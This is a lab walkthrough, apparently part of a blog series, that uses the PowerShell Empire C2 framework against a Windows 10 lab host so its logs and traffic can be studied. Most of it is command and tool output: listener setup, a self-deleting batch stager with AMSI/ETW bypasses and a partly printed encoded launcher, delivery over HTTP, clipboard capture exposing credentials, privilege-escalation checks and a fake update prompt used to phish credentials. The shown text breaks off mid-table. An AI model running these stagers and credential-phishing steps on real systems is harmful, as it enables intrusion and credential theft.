In this 5 part series, I'm learning more about Powershell Empire from the perspectives of using the tool, analyzing the logs which gets created as well as the packets as they traverse the networks.
1. Setup PowerShell Empire
First, checking what services are currently listening on my local device.
┌──(rootđź’€securitynik)-[~] └─# ss --numeric --listening --tcp State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
Next, I'm going to clear the database to remove any artifiacts from before.
┌──(rootđź’€securitynik)-[~/packets] └─# powershell-empire server --reset [*] Loading default config [>] Would you like to reset your Empire instance? [y/N]: y cp: cannot stat './powershell/Invoke-Obfuscation': No such file or directory [*] Setting up database. [*] Adding default user. [*] Adding database config. [*] Generating random staging key [*] Adding default bypasses. [*] Adding default keyword obfuscation functions.
Loading up the server side of PowerShell Empire using the default configuration.
┌──(rootđź’€securitynik)-[~/packets] └─# powershell-empire server --debug --config /etc/powershell-empire/config.yaml --restip 0.0.0.0 --socketport 9999 --username securitynik --password Testing1 Loading config from /etc/powershell-empire/config.yaml [*] Loading stagers from: /usr/share/powershell-empire/empire/server/stagers/ [*] Loading modules from: /usr/share/powershell-empire/empire/server/modules/ [*] Loading listeners from: /usr/share/powershell-empire/empire/server/listeners/ [*] Loading malleable profiles from: /usr/share/powershell-empire/empire/server/data/profiles [*] Searching for plugins at /usr/share/powershell-empire/empire/server/plugins [*] Plugin csharpserver found. [*] Initializing plugin... [*] Doing custom initialization... [*] Loading Empire C# server plugin [*] Registering plugin with menu... [*] Empire starting up... Username updated Password updated [*] Starting Empire RESTful API on 0.0.0.0:1337 [*] Starting Empire SocketIO on 0.0.0.0:9999 [*] Testing APIs [+] Empire RESTful API successfully started [+] Empire SocketIO successfully started [*] Cleaning up test user Server > EMPIRE TEAM SERVER | 0 Agent(s) | 0 Listener(s) | 1 Plugin(s)
Verifying that the server is now listening.
┌──(rootđź’€securitynik)-[~] └─# ss --numeric --listening --tcp State Recv-Q Send-Q Local Address:Port Peer Address:Port Process LISTEN 0 128 0.0.0.0:9999 0.0.0.0:* LISTEN 0 128 0.0.0.0:1337 0.0.0.0:*
With the server listening, time to connect the client
┌──(rootđź’€securitynik)-[~] └─# powershell-empire client [*] Loading default config ... Use the 'connect' command to connect to your Empire server. 'connect -c localhost' will connect to a local empire instance with all the defaults including the default username and password. [*] Attempting to connect to server: localhost [!] Invalid username and/or password (Empire) >
Now that we are in the Empire environment, time to connect to connect to the server.
To get help while connecting, in the client console: (Empire) > connect --help (Empire) > connect https://10.0.0.107 --port=1337 --socketport=9999 --username=securitynik --password=Testing1
======================================================================================== [Empire] Post-Exploitation Framework ======================================================================================== [Version] 4.0.2 BC Security Fork | [Web] https://github.com/BC-SECURITY/Empire ======================================================================================== [Starkiller] Multi-User GUI | [Web] https://github.com/BC-SECURITY/Starkiller ======================================================================================== _______ ___ ___ ______ __ ______ _______ | ____| | \/ | | _ \ | | | _ \ | ____| | |__ | \ / | | |_) | | | | |_) | | |__ | __| | |\/| | | ___/ | | | / | __| | |____ | | | | | | | | | |\ \----. | |____ |_______| |__| |__| | _| |__| | _| `._____| |_______| 391 modules currently loaded 0 listeners currently active 0 agents currently active [*] Connected to https://10.0.0.107 (Empire) > Connected to https://10.0.0.107:1337. 0 agents. 1 unread messages.
Looking at the server side of the communication, I see:
[+] securitynik connected to socketio
Further confirming that the client is connected to the server.
┌──(rootđź’€securitynik)-[/home/securitynik/packets] └─# ss --numeric --tcp | grep --perl-regexp "9999|1337" ESTAB 0 0 10.0.0.107:9999 10.0.0.107:41866 ESTAB 0 0 10.0.0.107:41866 10.0.0.107:9999
Good stuff. We're making progress.
Checking to see which listeners are currently configured if any.
(Empire) > listeners ┌Listeners List──────┬───────────────────┬────────────┬─────────┐ │ ID │ Name │ Module │ Listener Category │ Created At │ Enabled │ └────┴──────┴────────┴───────────────────┴────────────┴─────────┘
None! Setting up my first listener by reviewing and configuring some of the available options.
(Empire: listeners) > uselistener http (Empire: uselistener/http) > info Author @harmj0y Description Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach. Name HTTP[S] (Empire: uselistener/http) > set Cookie SecurityNik-HTTP-Listener-Cookie [*] Set Cookie to SecurityNik-HTTP-Listener-Cookie (Empire: uselistener/http) > set KillDate 11/22/2021 [*] Set KillDate to 11/22/2021 (Empire: uselistener/http) > set UserAgent SecurityNik-HTTP-Listener-User-Agent [*] Set UserAgent to SecurityNik-HTTP-Listener-User-Agent (Empire: uselistener/http) > set WorkingHours 00:00-23:59 [*] Set WorkingHours to 00:00-23:59 [*] Set BindIP to 10.0.0.107 (Empire: uselistener/http) > (Empire: uselistener/http) > set Port 443 [*] Set Port to 443 (Empire: uselistener/http) > set DefaultDelay 60 [*] Set DefaultDelay to 60
I changed the default delay / reachback from 5 seconds as I did not wish to see too much noise during the packet capturing.
Revisiting the configured options:
(Empire: uselistener/http) > options ┌Record Options────┬─────────────────────────────────────┬──────────┬─────────────────────────────────────┐ │ Name │ Value │ Required │ Description │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ BindIP │ 10.0.0.107 │ True │ The IP to bind to on the control │ │ │ │ │ server. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ CertPath │ │ False │ Certificate path for https │ │ │ │ │ listeners. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Cookie │ SecurityNik-HTTP-Listener-Cookie │ False │ Custom Cookie Name │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ DefaultDelay │ 60 │ True │ Agent delay/reach back interval (in │ │ │ │ │ seconds). │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ DefaultJitter │ 0.0 │ True │ Jitter in agent reachback interval │ │ │ │ │ (0.0-1.0). │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ DefaultLostLimit │ 60 │ True │ Number of missed checkins before │ │ │ │ │ exiting │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ DefaultProfile │ /admin/get.php,/news.php,/login/pro │ True │ Default communication profile for │ │ │ cess.php|Mozilla/5.0 (Windows NT │ │ the agent. │ │ │ 6.1; WOW64; Trident/7.0; rv:11.0) │ │ │ │ │ like Gecko │ │ │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Headers │ Server:Microsoft-IIS/7.5 │ True │ Headers for the control server. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Host │ http://10.0.0.107 │ True │ Hostname/IP for staging. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ KillDate │ 11/22/2021 │ False │ Date for the listener to exit │ │ │ │ │ (MM/dd/yyyy). │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Launcher │ powershell -noP -sta -w 1 -enc │ True │ Launcher string. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Name │ http │ True │ Name for the listener. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Port │ 443 │ True │ Port for the listener. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Proxy │ default │ False │ Proxy to use for request (default, │ │ │ │ │ none, or other). │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ ProxyCreds │ default │ False │ Proxy credentials │ │ │ │ │ ([domain\]username:password) to use │ │ │ │ │ for request (default, none, or │ │ │ │ │ other). │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ SlackURL │ │ False │ Your Slack Incoming Webhook URL to │ │ │ │ │ communicate with your Slack │ │ │ │ │ instance. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ StagerURI │ │ False │ URI for the stager. Must use │ │ │ │ │ /download/. Example: │ │ │ │ │ /download/stager.php │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ StagingKey │ ?4M6q)cLnvli}UCsu:rwf![~]79{#=O/ │ True │ Staging key for initial agent │ │ │ │ │ negotiation. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ UserAgent │ SecurityNik-HTTP-Listener-User- │ False │ User-agent string to use for the │ │ │ Agent │ │ staging request (default, none, or │ │ │ │ │ other). │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ WorkingHours │ 00:00-23:59 │ False │ Hours for the agent to operate │ │ │ │ │ (09:00-17:00). │ └──────────────────┴─────────────────────────────────────┴──────────┴─────────────────────────────────────┘
With the above configured, I then run execute to start the Listener.
(Empire: uselistener/http) > execute [+] Listener http successfully started
On the server side, the following was seen
[*] Starting listener 'http' [+] Listener successfully started! Server > EMPIRE TEAM SERVER | 0 Agent(s) | 1 Listener(s) | 1 Plugin(s)
Running the listener command again, this time I see.
(Empire: uselistener/http) > listeners ┌Listeners List──────┬───────────────────┬──────────────────────────────────────────┬─────────┐ │ ID │ Name │ Module │ Listener Category │ Created At │ Enabled │ ├────┼──────┼────────┼───────────────────┼──────────────────────────────────────────┼─────────┤ │ 1 │ http │ http │ client_server │ 2021-11-20 12:35:47 EST (48 seconds ago) │ True │ └────┴──────┴────────┴───────────────────┴──────────────────────────────────────────┴─────────┘
Further confirming there is a listener on port 443.
┌──(rootđź’€securitynik)-[/home/securitynik/packets] └─# ss --numeric --tcp --listening State Recv-Q Send-Q Local Address:Port Peer Address:Port Process LISTEN 0 128 0.0.0.0:9999 0.0.0.0:* LISTEN 0 128 0.0.0.0:1337 0.0.0.0:* LISTEN 0 128 10.0.0.107:443 0.0.0.0:*
With the listener configured, next up, selecting a stager.
I selected the windows/launcher_bat. This creates a self deleting batching file.
(Empire: listeners) > usestager windows/launcher_bat (Empire: usestager/windows/launcher_bat) > set Listener http [*] Set Listener to http (Empire: usestager/windows/launcher_bat) > set OutFile welcome.bat [*] Set OutFile to welcome.bat (Empire: usestager/windows/launcher_bat) > set UserAgent securitynik-launcher-bat-User-Agent [*] Set UserAgent to securitynik-launcher-bat-User-Agent
Reviewing the configured options
(Empire: usestager/windows/launcher_bat) > options ┌Record Options────┬─────────────────────────────────────┬──────────┬─────────────────────────────────────┐ │ Name │ Value │ Required │ Description │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Bypasses │ mattifestation etw │ False │ Bypasses as a space separated list │ │ │ │ │ to be prepended to the launcher │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Delete │ True │ False │ Switch. Delete .bat after running. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Language │ powershell │ True │ Language of the stager to generate. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Listener │ http │ True │ Listener to generate stager for. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Obfuscate │ False │ False │ Switch. Obfuscate the launcher │ │ │ │ │ powershell code, uses the │ │ │ │ │ ObfuscateCommand for obfuscation │ │ │ │ │ types. For powershell only. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ ObfuscateCommand │ Token\All\1 │ False │ The Invoke-Obfuscation command to │ │ │ │ │ use. Only used if Obfuscate switch │ │ │ │ │ is True. For powershell only. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ OutFile │ welcome.bat │ False │ Filename that should be used for │ │ │ │ │ the generated output, otherwise │ │ │ │ │ returned as a string. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Proxy │ default │ False │ Proxy to use for request (default, │ │ │ │ │ none, or other). │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ ProxyCreds │ default │ False │ Proxy credentials │ │ │ │ │ ([domain\]username:password) to use │ │ │ │ │ for request (default, none, or │ │ │ │ │ other). │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ StagerRetries │ 0 │ False │ Times for the stager to retry │ │ │ │ │ connecting. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ UserAgent │ securitynik-launcher-bat-User-Agent │ False │ User-agent string to use for the │ │ │ │ │ staging request (default, none, or │ │ │ │ │ other). │ └──────────────────┴─────────────────────────────────────┴──────────┴─────────────────────────────────────┘
With everything in place, time to generate the welcome.bat file.
(Empire: usestager/windows/launcher_bat) > generate [*] welcome.bat written to /usr/share/powershell-empire/empire/client/generated-stagers/welcome.bat
Copy the file to the /tmp folder.
┌──(rootđź’€securitynik)-[/home/securitynik/packets] └─# cd /tmp/ ┌──(rootđź’€securitynik)-[/tmp] └─# cp /usr/share/powershell-empire/empire/client/generated-stagers/welcome.bat . ┌──(rootđź’€securitynik)-[/tmp] └─# ls -l welcome.bat -rw-r--r-- 1 root root 4009 Nov 20 12:45 welcome.bat
Looking at the folders in the powershell-empire path.
┌──(rootđź’€securitynik)-[/tmp] └─# ls /var/lib/powershell-empire/ data empire empire.db empire.debug LastTask
Being a little curious to see what is so far in the empire.db file, using strings I see ...
┌──(rootđź’€securitynik)-[/tmp] └─# strings /var/lib/powershell-empire/empire.db | more SQLite format 3 ]3 securitynik$2b$12$uoR.NXYK98MnTFe1kWuqGOoTvRYiuhoDys2f65.Ywq9bHDVNeU40Wlffg4uuayna6os6iur3ua46t9um0ylp7hc4k8ufm2021-11-20 17:18:31 ^3httphttpclient_server Name Description Name for the listener. Required Value http SuggestedValues Strict Host Hostname/IP for staging. http://10.0.0.107:443 BindIP (The IP to bind to on the control server. 10.0.0.107 ... TRUNCATED FOR BREVITY ...
Looking at a snapshot of the content of the welcome.bat file.
┌──(rootđź’€securitynik)-[/tmp] └─# cat welcome.bat # 2>NUL & @CLS & PUSHD "%~dp0" & "%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe" -nol -nop -ep bypass "[IO.File]::ReadAllText('%~f0')|iex" & DEL "%~f0" & POPD /B powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAFIAUwBpAG8ATgBUAGEAQgBsAEUALgBQAFMAVgBFAHIAcwBpAG8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABSAEUARgA9AFsAUgBFAGYAXQAuAEEAcwBTAEUAbQBCAGwAWQAuAEcARQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIARQBmAC4ARwBF... TRUNCATED FOR BREVITY ... YQBUAGEAWwAwAC4ALgAzAF0AOwAkAEQAQQB0AEEAPQAkAGQAYQBUAGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUATgBHAHQAaABdADsALQBqAE8ASQBuAFsAQwBIAGEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
Interesting! Time to get this file to the target system. Setup a Python SimpleHTTPServer.
┌──(rootđź’€securitynik)-[/tmp] └─# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ...
2. Gaining Access
To gain access, we have to get the welcome.bat file to the user or influence the user to download and or open this file. Using the browser, I'm going to download and execute the file.
Below shows the file being downloaded
┌──(rootđź’€securitynik)-[/tmp] └─# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ... 10.0.0.110 - - [20/Nov/2021 12:56:02] "GET / HTTP/1.1" 200 - 10.0.0.110 - - [20/Nov/2021 12:56:04] code 404, message File not found 10.0.0.110 - - [20/Nov/2021 12:56:04] "GET /favicon.ico HTTP/1.1" 404 - 10.0.0.110 - - [20/Nov/2021 12:56:10] "GET /welcome.bat HTTP/1.1" 200 -
With the file downloaded, once it is run, here is what we see on the client console of Powershell Empire:
[+] New agent E7ULVTA6 checked in [*] Sending agent (stage 2) to E7ULVTA6 at 10.0.0.110 (Empire: usestager/windows/launcher_bat) >
and on the server side of empire ...
[*] Sending POWERSHELL stager (stage 1) to 10.0.0.110 [*] New agent E7ULVTA6 checked in [+] Initial agent E7ULVTA6 from 10.0.0.110 now active (Slack) [*] Sending agent (stage 2) to E7ULVTA6 at 10.0.0.110
Listing the agents, I see ...
(Empire: usestager/windows/launcher_bat) > agents ┌Agents─────────┬────────────┬─────────────┬──────────────────────┬────────────┬──────┬────────┬─────────────────────────┬──────────┐ │ ID │ Name │ Language │ Internal IP │ Username │ Process │ PID │ Delay │ Last Seen │ Listener │ ├────┼──────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤ │ 1 │ E7ULVTA6 │ powershell │ 10.0.0.110 │ SEC560STUDENT\sec560 │ powershell │ 3600 │ 60/0.0 │ 2021-11-20 13:40:10 EST │ http │ │ │ │ │ │ │ │ │ │ (30 seconds ago) │ │ └────┴──────────┴────────────┴─────────────┴──────────────────────┴────────────┴──────┴────────┴─────────────────────────┴──────────┘
Renaming the agent to something more meaningful.
(Empire: agents) > rename E7ULVTA6 SANS560WINlowpriv
Listing the agents, we see
(Empire: agents) > list ┌Agents──────────────────┬────────────┬─────────────┬──────────────────────┬────────────┬──────┬────────┬─────────────────────────┬──────────┐ │ ID │ Name │ Language │ Internal IP │ Username │ Process │ PID │ Delay │ Last Seen │ Listener │ ├────┼───────────────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤ │ 1 │ SANS560WINlowpriv │ powershell │ 10.0.0.110 │ SEC560STUDENT\sec560 │ powershell │ 3600 │ 60/0.0 │ 2021-11-20 13:43:22 EST │ http │ │ │ │ │ │ │ │ │ │ (18 seconds ago) │ │ └────┴───────────────────┴────────────┴─────────────┴──────────────────────┴────────────┴──────┴────────┴─────────────────────────┴──────────┘
Interacting with the agent.
(Empire: agents) > interact SANS560WINlowpriv (Empire: SANS560WINlowpriv) >
Now that we have an agent, a downloads folder has been created for that agent. There is also a file named LastTask.
┌──(rootđź’€securitynik)-[/tmp] └─# ls /var/lib/powershell-empire/ data downloads empire empire.db empire.debug LastTask
In the downloads folder, there is a folder named SANS560WINlowpriv, which represents the agent. Here is what gets written to the file once the agent gets registered.
┌──(rootđź’€securitynik)-[/tmp] └─# cat /var/lib/powershell-empire/downloads/SANS560WINlowpriv/agent.log | more 2021-11-20 13:04:03 : [*] Agent info: ID 1 session_id E7ULVTA6 listener http name E7ULVTA6 language powershell language_version 5 delay 60 jitter 0.0 external_ip 10.0.0.110 internal_ip 10.0.0.110 username SEC560STUDENT\sec560 high_integrity 0 process_name powershell process_id 3600 hostname SEC560STUDENT os_details Microsoft Windows 10 Enterprise session_key EXaWl+/do>Rk8ef2g`[^$t7D}Oywz\NC nonce 2658109564916705 checkin_time 2021-11-20 18:04:02+00:00 lastseen_time 2021-11-20 18:04:03+00:00 parent None children None servers None profile /admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko kill_date 11/22/2021 working_hours 00:00-23:59 lost_limit 60 [+] Agent E7ULVTA6 now active: 2021-11-20 13:43:22 : [*] Agent renamed from E7ULVTA6 to SANS560WINlowpriv
Moving forward, I will be tailing this file as follows, to see what is written as the tasks are executed.
┌──(rootđź’€securitynik)-[/tmp] └─# tail --follow --lines 0 /var/lib/powershell-empire/downloads/SANS560WINlowpriv/agent.log
3. Examining the system
With access gain, time to examine the system. First up, whoami.
(Empire: SANS560WINlowpriv) > whoami [*] Tasked E7ULVTA6 to run Task 1
Looking at the agent.log, I see.
2021-11-20 13:55:25 : tasked agent E7ULVTA6 to run command whoami 2021-11-20 13:56:12 : SEC560STUDENT\sec560
Looking at process information on the host.
(Empire: SANS560WINlowpriv) > ps [*] Tasked E7ULVTA6 to run Task 2
Confirming the activity from the agent.log file.
2021-11-20 14:36:14 : tasked agent E7ULVTA6 to run command ps 2021-11-20 14:36:26 : ProcessName PID Arch UserName MemUsage ----------- --- ---- -------- -------- Idle 0 x64 N/A 0.01 MB System 4 x64 N/A 0.09 MB Registry 88 x64 N/A 19.02 MB svchost 328 x64 N/A 45.00 MB smss 332 x64 N/A 0.91 MB svchost 376 x64 N/A 8.18 MB csrss 416 x64 N/A 4.07 MB .... dllhost 4500 x64 SEC560STUDENT\sec560 6.84 MB SearchUI 4576 x64 SEC560STUDENT\sec560 16.41 MB ...
Dropping down to the command shell to see what else we can do.
(Empire: SANS560WINlowpriv) > shell [*] Exit Shell Menu with Ctrl+C (SANS560WINlowpriv) C:\Users\sec560\Downloads >
Running the whoami command again, to grab information about groups and the integrity level the process is running with.
(SANS560WINlowpriv) C:\Users\sec560\Downloads > cmd.exe /c "whoami /groups" GROUP INFORMATION ----------------- Group Name Type SID Attributes ============================================================= ================ ============ ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Group used for deny only BUILTIN\Administrators Alias S-1-5-32-544 Group used for deny only BUILTIN\Users Alias S-1-5-32-545 Mandatory ... NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\Medium Mandatory Level Label S-1-16-8192 (SANS560WINlowpriv) C:\Users\sec560\Downloads >
While the process may not be running as administrator, the user that is running the process is part of the administrator group. This means, we can attempt to elevate privileges by taking advantage of something such as bypassuac.
Confirming the users who are part of the administrators group.
(SANS560WINlowpriv) C:\Users\sec560\Downloads > whoami SEC560STUDENT\sec560 (SANS560WINlowpriv) C:\Users\sec560\Downloads > net localgroup administrators
Looking at the agent.log.
2021-11-20 15:11:55 : tasked agent E7ULVTA6 to run command net localgroup administrators 2021-11-20 15:12:29 : Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator john sec560 The command completed successfully.
Going back to the Empire environment to perform additional analysis of the host.
Grabbing a screenshot of the system.
2021-11-20 15:17:49 : tasked agent E7ULVTA6 to run module Get-Screenshot 2021-11-20 15:18:30 : [+] Output saved to ./downloads/SANS560WINlowpriv/Get-Screenshot/SEC560STUDENT_2021-11-20_15-18-30.jpg
Opening the screenshot, we see
┌──(rootđź’€securitynik)-[/home/securitynik/packets] └─# xdg-open /var/lib/powershell-empire/downloads/SANS560WINlowpriv/Get-Screenshot/SEC560STUDENT_2021-11-20_15-18-30.jpg &
Grabbing a screenshot from a different perspective
(Empire: agents) > usemodule powershell/collection/screenshot ┌Record Options────┬──────────┬───────────────────────────────────┐ │ Name │ Value │ Required │ Description │ ├───────┼──────────┼──────────┼───────────────────────────────────┤ │ Agent │ E7ULVTA6 │ True │ Agent to run module on. │ ├───────┼──────────┼──────────┼───────────────────────────────────┤ │ Ratio │ 80 │ False │ JPEG Compression ratio: 1 to 100. │ └───────┴──────────┴──────────┴───────────────────────────────────┘ (Empire: usemodule/powershell/collection/screenshot) > execute [*] Tasked E7ULVTA6 to run Task 8 [+] Output saved to ./downloads/SANS560WINlowpriv/Get-Screenshot/SEC560STUDENT_2021-11-20_16-10-26.jpg (Empire: usemodule/powershell/collection/screenshot) >
Trying to run mimikatz
(Empire: SANS560WINlowpriv) > mimikatz [!] Error: module needs to run in an elevated context
Ooops!! Looks like we definitely need that elevated privileges. Looking to see what else can be learned about the system.
Grabbing contents from the clipboard.
(Empire: SANS560WINlowpriv) > usemodule powershell/collection/clipboard_monitor [*] Set Agent to SANS560WINlowpriv ┌Record Options───┬───────────────────┬──────────┬─────────────────────────────────────┐ │ Name │ Value │ Required │ Description │ ├─────────────────┼───────────────────┼──────────┼─────────────────────────────────────┤ │ Agent │ SANS560WINlowpriv │ True │ Agent to run module on. │ ├─────────────────┼───────────────────┼──────────┼─────────────────────────────────────┤ │ CollectionLimit │ │ False │ Specifies the interval in minutes │ │ │ │ │ to capture clipboard text. Defaults │ │ │ │ │ to indefinite collection. │ ├─────────────────┼───────────────────┼──────────┼─────────────────────────────────────┤ │ PollInterval │ 15 │ True │ Interval (in seconds) to check the │ │ │ │ │ clipboard for changes, defaults to │ │ │ │ │ 15 seconds. │ └─────────────────┴───────────────────┴──────────┴─────────────────────────────────────┘ (Empire: usemodule/powershell/collection/clipboard_monitor) > set CollectionLimit 5 [*] Set CollectionLimit to 5 (Empire: usemodule/powershell/collection/clipboard_monitor) > execute [*] Tasked SANS560WINlowpriv to run Task 9 Looking at the agent.log, we see. 2021-11-20 16:14:27 : Job started: XGSUZT 2021-11-20 16:15:28 : === Get-ClipboardContents Starting at 20/11/2021:21:18:02:34 === === 20/11/2021:21:18:02:58 === credentials for securitynik.local - securitynik:Password1 credentials for securitynik mail - securitynik:Password1Mail credentials for securitynik cloud - securitynik:Password1Cloud
Running checks for possible vectors for privilege escalations.
(Empire: SANS560WINlowpriv) > usemodule powershell/privesc/powerup/allchecks [*] Set Agent to SANS560WINlowpriv ┌Record Options──┬───────────────────┬──────────┬─────────────────────────────────────┐ │ Name │ Value │ Required │ Description │ ├────────────────┼───────────────────┼──────────┼─────────────────────────────────────┤ │ Agent │ SANS560WINlowpriv │ True │ Agent to run module on. │ ├────────────────┼───────────────────┼──────────┼─────────────────────────────────────┤ │ OutputFunction │ Out-String │ False │ PowerShell's output function to use │ │ │ │ │ ("Out-String", "ConvertTo-Json", │ │ │ │ │ "ConvertTo-Csv", "ConvertTo-Html", │ │ │ │ │ "ConvertTo-Xml"). │ └────────────────┴───────────────────┴──────────┴─────────────────────────────────────┘ (Empire: usemodule/powershell/privesc/powerup/allchecks) > execute [*] Tasked SANS560WINlowpriv to run Task 10
Looking at the agent.log.
2021-11-20 16:29:34 : Job started: NHVZSR 2021-11-20 16:30:34 : [*] Running Invoke-AllChecks [*] Checking if user is in a local group with administrative privileges... [+] User is in a local group that grants administrative privileges! [+] Run a BypassUAC attack to elevate privileges to admin. ... [*] Checking service executable and argument permissions... ... [*] Checking service permissions... [*] Checking %PATH% for potentially hijackable DLL locations... ... [*] Checking for AlwaysInstallElevated registry key... [*] Checking for Autologon credentials in registry... [*] Checking for modifidable registry autoruns and configs... [*] Checking for modifiable schtask files/configs... [*] Checking for unattended install files... [*] Checking for encrypted web.config strings... [*] Checking for encrypted application pool and virtual directory passwords... [*] Checking for plaintext passwords in McAfee SiteList.xml files.... [*] Checking for cached Group Policy Preferences .xml files.... Invoke-AllChecks completed
Since the recommendation above is to run a UAC Bypass attack, let's follow that guidance.
4. Elevate Privileges
There are a few different ways to elevate our privileges. First, let's confirm our current privileges.
(Empire: usemodule/powershell/privesc/powerup/allchecks) > agents ┌Agents──────────────────┬────────────┬─────────────┬──────────────────────┬────────────┬──────┬────────┬─────────────────────────┬──────────┐ │ ID │ Name │ Language │ Internal IP │ Username │ Process │ PID │ Delay │ Last Seen │ Listener │ ├────┼───────────────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤ │ 1 │ SANS560WINlowpriv │ powershell │ 10.0.0.110 │ SEC560STUDENT\sec560 │ powershell │ 3600 │ 60/0.0 │ 2021-11-20 16:34:35 EST │ http │ │ │ │ │ │ │ │ │ │ (26 seconds ago) │ │ └────┴───────────────────┴────────────┴─────────────┴──────────────────────┴────────────┴──────┴────────┴─────────────────────────┴──────────┘
What you will notice with above, is once we gain elevated privileges, the name will have an asterisk (*).
First, let's use the toasted option, to "ask" the user for their credentials.
(Empire: SANS560WINlowpriv) > usemodule powershell/collection/toasted [*] Set Agent to SANS560WINlowpriv (Empire: usemodule/powershell/collection/toasted) > set CredBoxTitle "SecurityNik is asking you to restart ;-)" [*] Set CredBoxTitle to SecurityNik is asking you to restart ;-) (Empire: usemodule/powershell/collection/toasted) > options ┌Record Options──┬───────────────────────────────────┬──────────┬─────────────────────────────────────┐ │ Name │ Value │ Required │ Description │ ├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Agent │ SANS560WINlowpriv │ True │ Agent to phish credentials from │ ├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Application │ System Configuration │ True │ Name of the application to claim │ │ │ │ │ launched the prompt (ie. "outlook", │ │ │ │ │ "explorer") │ ├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ CredBoxMessage │ Authentication is required to │ True │ Message of the box prompting for │ │ │ reschedule a system restart │ │ credentials │ ├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ CredBoxTitle │ SecurityNik is asking you to │ True │ Title on the box prompting for │ │ │ restart ;-) │ │ credentials │ ├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ HideProcess │ │ False │ Switch. True/False to hide the │ │ │ │ │ window of the process we claim │ │ │ │ │ launched the prompt (default = │ │ │ │ │ false) │ ├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ ToastMessage │ Windows will soon restart to │ True │ Message of toast notification box │ │ │ complete applying recently │ │ │ │ │ installed updates. Use the drop │ │ │ │ │ down below to reschedule the │ │ │ │ │ restart for a later time. │ │ │ ├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ ToastTitle │ Windows will restart in 5 minutes │ True │ Title of toast notification box │ │ │ to finish installing updates │ │ │ ├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ ToastType │ System │ True │ Type of Toast notification │ │ │ │ │ ("System" or "Application") │ ├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ VerifyCreds │ │ False │ Switch. True/False to verify the │ │ │ │ │ creds a user provides, and prompt │ │ │ │ │ them again until they either click │ │ │ │ │ cancel or 